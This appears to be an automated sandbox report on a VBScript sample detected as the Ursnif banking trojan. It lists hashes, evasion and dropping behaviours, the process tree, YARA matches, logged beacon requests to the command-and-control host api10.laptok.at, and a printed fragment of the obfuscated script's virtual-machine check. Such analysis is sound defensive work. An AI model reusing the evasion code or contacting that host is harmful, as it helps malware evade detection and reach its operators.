
Analysis Report j2TrdIoHFE7b.vbs

Overview

General Information

Sample Name: j2TrdIoHFE7b.vbs
Analysis ID: 284622
MD5: 0671e735481a55031081895bf0f57760
SHA1: 11788132e8b10e6370530d68d2d562737ef1dae0
SHA256: f9ad25e0810fc3f545213be438f531677595044c6a64d6b367e93b9aad9910e6

Most interesting Screenshot:

Detection

Ursnif
Score: 92
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Benign windows process drops PE files
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
Yara detected Ursnif
Creates processes via WMI
Deletes itself after installation
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
AV process strings found (often used to terminate AV products)
Contains capabilities to detect virtual machines
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found dropped PE file which has not been started or loaded
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Tries to load missing DLLs

Classification

Startup

  • System is w10x64
  • wscript.exe (PID: 5200 cmdline: C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\j2TrdIoHFE7b.vbs' MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
  • iexplore.exe (PID: 1772 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 912 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1772 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
      • ssvagent.exe (PID: 4932 cmdline: 'C:\PROGRA~2\Java\JRE18~1.0_2\bin\ssvagent.exe' -new MD5: A3DBA514D38464A5C5A9DEA19E6159F9)
  • iexplore.exe (PID: 4136 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 4664 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4136 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • iexplore.exe (PID: 3848 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 5620 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3848 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • iexplore.exe (PID: 3940 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 2948 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3940 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000004.00000003.333764554.0000000005578000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000004.00000003.333746168.0000000005578000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000004.00000003.333656337.0000000005578000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000004.00000002.1265151997.0000000005578000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000004.00000003.333680553.0000000005578000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
(4 further entries collapsed in the original report)

Sigma Overview

No Sigma rule has matched

Signature Overview


AV Detection:

Multi AV Scanner detection for domain / URL
Source: api10.laptok.at | Virustotal: Detection: 8%
Multi AV Scanner detection for submitted file
Source: j2TrdIoHFE7b.vbs | Virustotal: Detection: 12%
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\Local
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\Documents\desktop.ini
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\Local\Temp
Source: Joe Sandbox View | ASN Name: SELECTELRU SELECTELRU
Source: global traffic | HTTP traffic detected: GET /api1/uP6dS_2BMjl_/2Ff6pE5oBHR/OL2vr5G67W_2Fz/1ONyiuhjZBmGx_2Fd2SwU/bs54JDJUaSah9Jpj/_2B6Uzn7v9dlVVZ/AQ_2FC0dEsmRmsdS0R/F3VycrnZL/1SLHPAgp2VELiwfZiUt7/IgzRq3adeaf8rKvMx9J/3sI2_2FYEFx138BFRXqa5c/UjcOYKjbdxyDe/3aFM_2F_/2FAGQ_2BPU5e_2Bvl0J1MyN/03QeuTUWO8/55YMNFd5cpVa_2FGC/GxLG7duFNVIb/g9odwiL9jNs/iIdlq_0A_0DrXj/F4r0mwPasaYBlGGWZY_2F/4tJN6AFTgTbJIl1E/N05mpOEU/l HTTP/1.1 | Accept: text/html, application/xhtml+xml, image/jxr, */* | Accept-Language: en-US | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Accept-Encoding: gzip, deflate | Host: api10.laptok.at | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /api1/xnSgUzPUlfzDY/NnQK_2FF/Kqmx7XhG7YFPPHp212iNaR7/TKvOl_2BtH/m3jG9qeTV83WDVAQZ/zMmfH0Ea5HKo/994rCMGbyXi/hc1IqdP_2FyYpK/vtsIYLFyt_2BhFTJdiogi/GtIZ00K3g_2Bxep2/9hRwhxl38Hpzw3J/f0zK5MJHl0QxCvZD8n/bXLIwWVOr/spTB6nLJPHHwRvgUQ6_2/BdmuHP1ixwgSHI1q_2B/D_2FHiYEFH4arvJUtMmnXV/gRfPMVSgmVKOv/GST2lC9_/0A_0DU5vH8Mj7f4sOWE5Xar/lEDvZ2EcY3/_2F2WFAa9gcoHv_2Bc/yxI0q HTTP/1.1 | Accept: text/html, application/xhtml+xml, image/jxr, */* | Accept-Language: en-US | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Accept-Encoding: gzip, deflate | Host: api10.laptok.at | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /api1/iSDZW0gW/FHitodpK1N7Y3oE1u77lQYK/IONG8VIzKH/siCwYSY2kuo4wx6EZ/8L2Qvw0eqUw2/I7NO1HjDrRE/5GanGbBobDoc58/na3Q_2B_2FJrpcag_2FIz/i_2BMAfwtqgEFSEb/roES8FF88GModpl/cCNa23kRLvGrKjLgwN/KcMhiO7TO/4cYxLFBZpQqgZc88hd3c/ibpkZm7KlqOOO2v40am/EqtUMS7vVjiizfWY1WwNev/A2AdVZSeKmkoR/DASGEzsI/B_2BUe_0A_0DiEmMjenNgW0/Y8O9rQwe7c/2jmiPy7O_2BOAvCUG/pWyxtMo_2BzW/HZr8FNXk1Fb/JDjG70ME/LE8 HTTP/1.1 | Accept: text/html, application/xhtml+xml, image/jxr, */* | Accept-Language: en-US | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Accept-Encoding: gzip, deflate | Host: api10.laptok.at | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /api1/oNFCJaacsxr9zVG5bj17ms/ePPXDd0KRJ1NN/NoDjo_2B/A9PaE7o5ioMqdrDhcSgHt0q/hqUBq7_2BK/Cz1tc_2BmIjjY_2B1/X_2FA_2BNIbn/2XXfZ_2BGud/P_2FzEv3Fi9mMW/tz7jXdGGAmJwUKnNcW7rf/KwzL8ihIcssmFqzj/e0QKJF12ORg1C8D/OCrfBkhgfIH81_2FiS/D_2BtDEZM/gHCQeNjvYXpqsXIiMzI0/evEWqS87OUqzzCc3gie/kj5aSZ2XCD7TgwCnoiWpja/6T_0A_0DBKAjy/15PAX4zU/e2X_2BlnphvBKt8UNGf4uw5/CDcZDY8d0w/thBapLj_2B7mMFrnp/pry2Oag1/A HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:79.0) Gecko/20100101 Firefox/79.0 | Host: api10.laptok.at
Source: global traffic | HTTP traffic detected: GET /api1/ByN_2Ba5pHmCUKwc/LkgDlS93ASX_2Bw/_2Bpmdzy9fRnvTk6J2/goHi0A6bz/oxCru_2FGYAoKpN1zBqI/gyCK_2FpAv2t0nWc62X/_2FqBH9kri5d_2FIIHQB_2/Fu49sKuTiZqQe/zsxykUCG/Vi2BTzaP8edSr97QiWG5hf2/sUXbjQP5DG/YgdiDn53bv80QUH_2/BEpbalczJFBY/yQjLswAPXgZ/qmZoG11Z1bPgRN/yxC7N6YFKVO9jwKxnNP2Q/LXm6IfbDjvgRxgab/HFXgIA_0A_0DYw1/4IfJg_2FJ0sYwMmurl/qqtg1KtFp/SZMupMmZc7imxqM976fJ/7_2Fsm5P_2FVJU7x9IO/9vnRp HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:79.0) Gecko/20100101 Firefox/79.0 | Host: api10.laptok.at
Source: global traffic | HTTP traffic detected: GET /api1/wBdLJFIdNx_2F0E/nNLvsuZSHH_2FIbeFO/BE_2F4JeP/LT0mwtJbAfsgn1xmPmx_/2F5GWbYEfy1Gn63M_2B/_2Bs_2Flhia2cKq3ICLgA_/2FrrGg7mff5yt/SHCKZ6Tt/xyzUgjPVIgTpnoiuMW7IoZh/trZ4_2BmAr/zrqIC4YIe30AKuzxr/_2BFVt4Y1si2/lG2lDpzdj8x/qDhb32vJ2RB9cw/Nv6OdMCf751A9V7ff0U7H/dYg_2BYJ5Ow4H2rJ/2RVPKE2XDgCzZvD/koDqnlklpic_0A_0D7/C_2B2kWa1/GtCSkY1vSD_2BaE_2FDJ/JPKuMU_2BzJ5nRmu2Rh/V_2FYT4X HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:79.0) Gecko/20100101 Firefox/79.0 | Host: api10.laptok.at
Source: global traffic | HTTP traffic detected: GET /api1/DygN80dQ_2BaGuSVpw/bANybTlq9/wpkl21VRdQ3TOJrcRaki/FZVqBPUbvhW_2BevuKl/GsBt0aOTzVYILjUucpTmP4/FZ11lSAA7KpuP/ageZ9pl4/Lbx_2FqMifjto9D2TgNOLSm/rHbXQqvzm2/zc9SrIBa8GsUKdGWq/C19rQVqkDnok/qfqzhZ3cHL_/2FkfRgmSKc02tD/7tCvxVN8uUpHTZp4KEfSW/JAEh_2BSLVZ_2BaW/FZ4q2kGmWH13sfA/98VwVazRUpObuvF_2B/_0A_0DlIA/XUcbN5EORSjAIznJA9mu/MGJsQjUEqdRy7_2F0sJ/qRR9oiwuDII9gSGlKzkh4Z/v6_2BzWk HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:79.0) Gecko/20100101 Firefox/79.0 | Host: api10.laptok.at
Source: global traffic | HTTP traffic detected: GET /api1/ENCUp3cLC6Z/LW95Z9D36yFK4D/qH7UYy29VS6P_2BKM_2Fk/juKZHw8zHkx9tPZd/B50bfZIrBqteosk/CJptjbMR0sPNW7CF4Z/diMOw6_2B/hZXQegAXpR1H_2By1308/W1OKaX8HASjRi_2B4O2/iqoQaJiM5uNx8xQSB0rhwD/DGPZ1Z5Kt_2Bv/DSB8ZTgy/QdvVLguOqjtGwyAYypQ6vcr/_2B6FWVdQm/NCxdKQO08l7PEc1US/OiDObEdBtrZj/hPEKwFnNdti/vQlRA6G_0A_0DI/gUL6xS9K3ymLVjs9kIUwP/s0FhU8NVzdY0GJOd/_2FOLejWQ7ReClt/cG9z9ntbZ/0OeJbJ6Q HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:79.0) Gecko/20100101 Firefox/79.0 | Host: api10.laptok.at
Source: global traffic | HTTP traffic detected: GET /api1/Q2S_2F_2FF_2F/Jhc84r6W/DOdsfq1FICiKIl9m89pH2t_/2FEZdM7j2g/a3lQN9HeeevGGQ7Wl/s_2B2sW2rm0U/caU9Q6rqhhd/Un0FHNyGMazt8c/iD8NOmeCMDoBFUEIooO_2/BJ9ch4AjrHdPedaU/P9J_2Bk7eAjNekL/b_2BiB8Rm72z572xvk/PSFJu_2BC/zU8_2FrlvdK8cTzsDUvT/xe_2BPtFUbeEsYQG8DW/QQ1jc_2Fh1EDMGidoE2z7o/nnhRtZzQbv4d8/20sYbms2/Cx2Yks8_0A_0D8qF7EAUhSN/UclxjJkn7Z/r_2BpY3wUzeaX2Jom/FPWWpglAd7Ai/liPPD6IfqjF8KpHITg/Pgj HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:79.0) Gecko/20100101 Firefox/79.0 | Host: api10.laptok.at
Source: global traffic | HTTP traffic detected: GET /api1/fqNQ_2FXTt2dTj/CXII90dg5f79HV7B_2Bij/21yB93hsr_2Byb3f/e9_2B3XStOM0iUH/zosE6zTnwL3_2B2pxj/KgAtNGysF/STFb73TfWMEYCYogYbSC/4sRVEeHsCAIArG1GGyy/vsEWC_2BjcYCXxSqZ5d06n/2QDk3EZo3I_2B/DjHer5KB/xYxvHTvipDezh_2BNMjwj1Q/wMoiXn0yAe/vpduI6SN217a5FOMl/anSg_2Bf_2Be/mELPiRo_2Fg/CqK5biWJyRoWdb/Ydi_2FUwlo6S7S_0A_0Dg/G6DVtJSxKKfsoBe6/DP1E3QO3mAGXQJ_/2Fqc8P7fao3284R/H8 HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:79.0) Gecko/20100101 Firefox/79.0 | Host: api10.laptok.at
Source: global traffic | HTTP traffic detected: GET /api1/ERlhcvFaXd/GqSHxNi2o8a9pppFq/1US1edpWD9vt/ERJVbq2exXK/uYEcBxYQ0puwql/adlEZyCqctF1gLl43_2FK/ldMnWMiy86CvhbpI/LM3FeoIcqaGMkHh/3VwE7Lwos2Yt70oN8b/bPPFOLM2g/vNtyHqpevUDMD93vtWEX/LeOxmXDE8OQsvaav4SK/rPAkQ8Horb_2BK7NJ8agHA/cqNhQ56Fed7Xa/FDSO66_2/BERxE_2FmU86HAgyp8f7lVa/zbsdreY_2F/cnlq_0A_0DnHC9UV_/2Fr8H9SBNERe/ZLfJT25voLa/f7CVerY2F8FJw4/R9LvlRTUrCR7rbsOBasXk/R7Lfj HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:79.0) Gecko/20100101 Firefox/79.0 | Host: api10.laptok.at
Source: global traffic | HTTP traffic detected: GET /api1/lJIp4mf7_2BHiHGjPW/6ZRg2WIT1/7uGoCxsojDNfoPbj9Wxl/hqqWeeZmVPj58xCWyVu/gbcAcLbRVkaRprhKatQUzQ/CzHq4b1HXLIRv/tD71xUEX/yhD0s2LEisn9DP3fb9y_2FS/yaqoRhWXoD/dmQ71UvJHQb0YYWD1/w6GXtgWTsLpo/g7X1iEbrcnz/zuRQoun2QL0s44/aPD9DTQLj5GVmSaO3W2_2/BhAbhdZAcY0pxyXn/61rBwIodyEKJKtm/kPyCgy5Bat_0A_0DeA/WjFuraS5f/aUBIfgwXw_2Bktr9W66N/ctPiHxpVrOQyr2FtfzK/PDFs0PO36brJZd/_2BfLcAc HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:79.0) Gecko/20100101 Firefox/79.0 | Host: api10.laptok.at
Source: global traffic | HTTP traffic detected: GET /api1/wSD_2FKZHisrP/MO_2BDWP/0zhoZvR2AmI6pPiHI9HdvxQ/UYayVW6KUF/p3e869GjGFi18Gu5_/2BIz0dYK5Fkk/NBvumHMvGek/SHygw4g0M4CvzV/IIUw5JYAv4bjWpGiNfVUm/xAmnPrJH6Gb_2FV0/xNsncwTIasTPfyJ/_2B8N0UizCVL02fLVe/BCNolMG4b/TmAoNUJhn5xMYnZzAYwk/dB0L8V0_2Fn9rbkxZOR/cnb4TZXrfoY5dOrbrfIKgC/v3sxNfnjH2UUo/tEn_0A_0/D9tZVyorkcCZANi_2BwmPR_/2F37SK3V6j/CNHSOE_2F94veTxkh/6NGIxtR34t0f/NmqZfZThSzd3/S HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:79.0) Gecko/20100101 Firefox/79.0 | Host: api10.laptok.at
Source: msapplication.xml1.12.dr | String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0xb70c1d67,0x01d688aa</date><accdate>0xb70c1d67,0x01d688aa</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml1.12.dr | String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0xb70c1d67,0x01d688aa</date><accdate>0xb70c1d67,0x01d688aa</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml6.12.dr | String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0xb710e244,0x01d688aa</date><accdate>0xb710e244,0x01d688aa</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml6.12.dr | String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0xb710e244,0x01d688aa</date><accdate>0xb710e244,0x01d688aa</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml8.12.dr | String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0xb713446d,0x01d688aa</date><accdate>0xb713446d,0x01d688aa</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: msapplication.xml8.12.dr | String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0xb713446d,0x01d688aa</date><accdate>0xb713446d,0x01d688aa</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: unknown | DNS traffic detected: queries for: api10.laptok.at
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Fri, 11 Sep 2020 17:15:54 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close | Vary: Accept-Encoding | Content-Encoding: gzip | Data Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a | Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30
Source: msapplication.xml.12.dr | String found in binary or memory: http://www.amazon.com/
Source: msapplication.xml2.12.dr | String found in binary or memory: http://www.google.com/
Source: msapplication.xml3.12.dr | String found in binary or memory: http://www.live.com/
Source: msapplication.xml4.12.dr | String found in binary or memory: http://www.nytimes.com/
Source: msapplication.xml5.12.dr | String found in binary or memory: http://www.reddit.com/
Source: msapplication.xml6.12.dr | String found in binary or memory: http://www.twitter.com/
Source: msapplication.xml7.12.dr | String found in binary or memory: http://www.wikipedia.com/
Source: msapplication.xml8.12.dr | String found in binary or memory: http://www.youtube.com/

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif
Source: Yara match | File source: 00000004.00000003.333764554.0000000005578000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.333746168.0000000005578000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.333656337.0000000005578000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.1265151997.0000000005578000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.333680553.0000000005578000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.333618475.0000000005578000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.333591183.0000000005578000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.333702930.0000000005578000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.333727521.0000000005578000.00000004.00000040.sdmp, type: MEMORY

E-Banking Fraud:

Yara detected Ursnif
Source: Yara match | File source: 00000004.00000003.333764554.0000000005578000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.333746168.0000000005578000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.333656337.0000000005578000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.1265151997.0000000005578000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.333680553.0000000005578000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.333618475.0000000005578000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.333591183.0000000005578000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.333702930.0000000005578000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.333727521.0000000005578000.00000004.00000040.sdmp, type: MEMORY
Source: j2TrdIoHFE7b.vbs | Initial sample: Strings found which are bigger than 50
Source: C:\Windows\System32\wscript.exe | Section loaded: msdart.dll
Source: classification engine | Classification label: mal92.troj.evad.winVBS@15/42@14/2
Source: C:\Program Files\internet explorer\iexplore.exe | File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High
Source: C:\Windows\System32\wscript.exe | File created: C:\Users\user\AppData\Local\Temp\adobe.url
Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\j2TrdIoHFE7b.vbs'
Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process
Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Windows\System32\wscript.exe | File read: C:\Users\desktop.ini
Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: j2TrdIoHFE7b.vbs | Virustotal: Detection: 12%
Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\j2TrdIoHFE7b.vbs'
Source: unknown | Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknown | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1772 CREDAT:17410 /prefetch:2
Source: unknown | Process created: C:\Program Files (x86)\Java\jre1.8.0_211\bin\ssvagent.exe 'C:\PROGRA~2\Java\JRE18~1.0_2\bin\ssvagent.exe' -new
Source: unknown | Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknown | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4136 CREDAT:17410 /prefetch:2
Source: unknown | Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknown | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3848 CREDAT:17410 /prefetch:2
Source: unknown | Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknown | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3940 CREDAT:17410 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1772 CREDAT:17410 /prefetch:2
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe | Process created: C:\Program Files (x86)\Java\jre1.8.0_211\bin\ssvagent.exe 'C:\PROGRA~2\Java\JRE18~1.0_2\bin\ssvagent.exe' -new
Source: C:\Program Files\internet explorer\iexplore.exe | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4136 CREDAT:17410 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3848 CREDAT:17410 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3940 CREDAT:17410 /prefetch:2
Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Lync
Source: j2TrdIoHFE7b.vbs | Static file information: File size 1452344 > 1048576
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe | File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll
Source: Binary string: c:\meet\well\Brought\story\During\2\claim\84\Could\6\Element\Motion\3\Shore\market.pdb | source: ogress.psd.0.dr

Data Obfuscation:

VBScript performs obfuscated calls to suspicious functions
            Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: WScript.ScriptName, cStr(555551152)) > 0 And astronomy146 = 0) ThenExit Function' gargle triphammer fusillade Emile goober height Colombia317 Cameroon infantile macaque Virgil15 larynx Blair Vassar citron Marjory319 ticket Horowitz doubt pounce genius prolate expurgate trichloroethane hap114 gurgle spear Tommie stereo contraption clank710 counterfeit boutique teenage attrition stratify stannic polysemous volcanism candle stenographer649 noontime metallography, 8485223 chrome night clapboard squalid wacky. 1611065 iambic Belgrade697 peaceful kickback formulaic versus tuff598 xerox899 gaur registrable quagmire. distort767 bodybuilding channel diagrammed parolee900 Balzac. acme. Kirkpatrick stardom virgin payroll688, 230300 Corbett646 Isaiah tectonic Sharon787 abolition planet nightshade Bini touchdown condescension effusion728 societal proverbial822 raven erosion twig gadgetry. cavalier townsmen Arlen solitary exclusive Togo side960 crore gardenia skyhook proctor End IfSet waggle651 = GetObject("winmgmts:\\.\root\cimv2")Set adjust193lItems = waggle651.ExecQuery("Select * from Win32_Processor", , ((46 + 34.0) + (-((88 + (-60.0)) + 4.0))))For Each glycine543 In adjust193lItemsIf glycine543.NumberOfCores < (((1786 - 1758.0) + (40 + (-30.0))) - 35.0) ThenISsAHR = TrueREM soup extent populism curvilinear Ethiopia290 adposition lineman glycerinate77 Hillcrest Vance scapula metazoa console48 athletic herringbone raillery jure adorn fiance Middlesex miniature58 spiritual McHugh813 Bengal repelling pyrotechnic bivalve215 Cottrell Sandburg seder swart murk comprehend serology Tunis souvenir362 hoodlum quartile pike switchboard clairvoyant arabesque580 continual bindle collard616 chassis rainy fifteenth shorthand End IfREM prosody indices. 2301989 booky875 Swede hardcopy lessee devotion507, 9597409 Congo542 commandant493 Syria. bakery692. 
